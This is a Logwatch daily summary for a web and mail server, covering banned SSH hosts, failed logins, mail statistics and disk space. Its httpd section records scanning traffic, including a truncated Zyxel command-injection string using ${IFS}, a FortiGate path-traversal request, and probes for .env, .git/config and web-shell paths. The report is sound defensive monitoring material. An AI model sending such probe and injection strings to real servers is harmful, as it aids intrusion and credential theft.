################### Logwatch 7.4.0 (03/01/11) ####################
Processing Initiated: Thu Jan 25 04:42:03 2024
Date Range Processed: yesterday
( 2024-Jan-24 )
Period is day.
Detail Level of Output: 0
Type of Output/Format: mail / text
Logfiles for Host: h2361197.stratoserver.net
##################################################################
--------------------- fail2ban-messages Begin ------------------------
Banned services with Fail2Ban: Bans:Unbans
ssh: [280:288]
---------------------- fail2ban-messages End -------------------------
--------------------- httpd Begin ------------------------
A total of 15 sites probed the server
Requests with error response codes
400 Bad Request
null: 18 Time(s)
/: 8 Time(s)
*: 4 Time(s)
/.env: 2 Time(s)
[\x22miner1\x22,: 2 Time(s)
\x00\x00BBBB\xBA\x8C\xC1\xABDAAA: 2 Time(s)
mstshash=Administr: 2 Time(s)
/bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${I ... }zyxel.selfrep;: 1 Time(s)
/index.htm: 1 Time(s)
1\xC4\xEC\xEF\xA6kc1\x9EiD(\x91\x1E\xFE\xD ... x09\xC0\x13\xC0: 1 Time(s)
NT: 1 Time(s)
\x8B\x04\x7F\xFB\x91ti\xF9#CC\xFE\xB3={\xF ... D\xC0$\xC0(\xC0: 1 Time(s)
\x96|\x9D\x15fg5\xC0.\x13\x1A<\x94\x94e>\x8F: 1 Time(s)
\xD2\xD3\x13\xAF\x95\xF7:B\xBE\xC4\xA6\x22 ... x09\xC0\x13\xC0: 1 Time(s)
500 Internal Server Error
/: 24 Time(s)
/.env: 4 Time(s)
/web_shell_cmd.gch: 3 Time(s)
/cgi-bin/jarrewrite.sh: 2 Time(s)
/.git/config: 1 Time(s)
/FD873AC4-CF86-4FED-84EC-4BD59C6F17A7: 1 Time(s)
/actuator/gateway/routes: 1 Time(s)
/ajax: 1 Time(s)
/api/v2/cmdb/system/admin/admin: 1 Time(s)
/autodiscover/autodiscover.json?@zdi/Powershell: 1 Time(s)
/cf_scripts/scripts/ajax/ckeditor/ckeditor.js: 1 Time(s)
/dana-na/help/logo.gif: 1 Time(s)
/favicon.ico: 1 Time(s)
/geoserver/web/: 1 Time(s)
/remote/fgt_lang?lang=/../../../..//////// ... lvpn_websession: 1 Time(s)
/robots.txt: 1 Time(s)
/webui/: 1 Time(s)
502 Bad Gateway
/-rCRU_K7RWOzSTXDghlneA/pdf: 1 Time(s)
/StAPF18,6:FSAntworten_auf_resos/pdf: 1 Time(s)
/yaml-metadata/pdf: 1 Time(s)
---------------------- httpd End -------------------------
--------------------- pam_unix Begin ------------------------
sshd:
Authentication Failures:
Invalid Users:
Unknown Account: 734 Time(s)
---------------------- pam_unix End -------------------------
--------------------- Postfix Begin ------------------------
1 Miscellaneous warnings
23.965K Bytes accepted 24,540
23.965K Bytes sent via SMTP 24,540
======== ==================================================
2 Accepted 100.00%
-------- --------------------------------------------------
2 Total 100.00%
======== ==================================================
1 4xx Reject relay denied 100.00%
-------- --------------------------------------------------
1 Total 4xx Rejects 100.00%
======== ==================================================
102 Connections
10 Connections lost (inbound)
102 Disconnections
2 Removed from queue
2 Sent via SMTP
1 SMTP dialog errors
1 Hostname verification errors (FCRDNS)
---------------------- Postfix End -------------------------
--------------------- sendmail-largeboxes (large mail spool files) Begin ------------------------
Large Mailbox threshold: 40MB (41943040 bytes)
Warning: Large mailbox: mailman.gz (1747199807)
Warning: Large mailbox: mailman (235703599967)
---------------------- sendmail-largeboxes (large mail spool files) End -------------------------
--------------------- SSHD Begin ------------------------
Disconnecting after too many authentication failures for user:
invalid : 1 Time(s)
root : 24 Time(s)
Failed logins from:
Illegal users from:
2001:470:1:fb5:6014:3e15:a7fe:74ea: 1 time
undef: 312 times
**Unmatched Entries**
Disconnecting: Protocol error: expected packet type 21, got 20 [preauth] : 3 time(s)
Disconnecting: Change of username or service not allowed: (admin,ssh-connection) -> (ubnt,ssh-connection) [preauth] : 1 time(s)
Disconnecting: Change of username or service not allowed: (root,ssh-connection) -> (admin,ssh-connection) [preauth] : 1 time(s)
Disconnecting: Change of username or service not allowed: (0,ssh-connection) -> (root,ssh-connection) [preauth] : 1 time(s)
---------------------- SSHD End -------------------------
--------------------- Disk Space Begin ------------------------
Filesystem Size Used Avail Use% Mounted on
/dev/ploop33632p1 394G 243G 132G 65% /
none 4.0G 0 4.0G 0% /dev
---------------------- Disk Space End -------------------------
###################### Logwatch End #########################